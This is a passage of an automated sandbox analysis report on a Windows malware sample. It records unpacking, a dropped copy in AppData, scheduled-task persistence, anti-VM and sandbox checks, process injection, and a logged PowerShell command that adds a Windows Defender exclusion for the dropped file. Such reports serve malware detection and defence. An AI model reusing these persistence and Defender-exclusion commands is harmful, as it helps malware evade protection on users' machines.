                      Source: g94e4BgSRN.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: g94e4BgSRN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\hXbuxbBIVw\src\obj\Debug\SoapInteg.pdb source: g94e4BgSRN.exe, SiEKNQVnm.exe.0.dr

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: g94e4BgSRN.exe, CsDO.CodeGenerator/frmMain.cs.Net Code: CALLCONV System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: SiEKNQVnm.exe.0.dr, CsDO.CodeGenerator/frmMain.cs.Net Code: CALLCONV System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040DCE9 push ecx; mov dword ptr [esp], 00423976h9_2_0040DD9F
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040DCE9 push ebp; mov dword ptr [esp], 0042398Ah9_2_0040DDD9
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040DCE9 push edx; mov dword ptr [esp], 00423997h9_2_0040DDF7
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040DCE9 push edx; mov dword ptr [esp], esi9_2_0040E394
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040A4BC push esi; mov dword ptr [esp], 00423347h9_2_0040A543
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00409953 push edi; mov dword ptr [esp], 00000091h9_2_00409980
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00409953 push ebp; mov dword ptr [esp], 00000090h9_2_0040998D
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00411D8C push edx; mov dword ptr [esp], edi9_2_00412058
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00409E61 push eax; mov dword ptr [esp], ebx9_2_00409FDE
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00406E04 push ecx; mov dword ptr [esp], ebx9_2_00406E69
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040262F push edx; mov dword ptr [esp], edi9_2_004027C8
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040262F push edx; mov dword ptr [esp], edi9_2_00402815
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040262F push edx; mov dword ptr [esp], edi9_2_004029B2
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004146E1 push eax; mov dword ptr [esp], ebx9_2_0041470B
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040970C push eax; mov dword ptr [esp], 0042B4A0h9_2_004097B9
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.52177326572
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.52177326572
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile created: C:\Users\user\AppData\Roaming\SiEKNQVnm.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.g94e4BgSRN.exe.266b210.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.g94e4BgSRN.exe.265f1b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: g94e4BgSRN.exe PID: 6384, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: g94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: g94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exe TID: 6388Thread sleep time: -38878s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exe TID: 6428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6955Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1506Jump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004132E6 GetSystemInfo,9_2_004132E6
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeThread delayed: delay time: 38878Jump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: g94e4BgSRN.exe, 00000009.00000002.518230081.00000000012C8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeMemory written: C:\Users\user\Desktop\g94e4BgSRN.exe base: 400000 value starts with: 4D5AJump to behavior
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exeJump to behavior
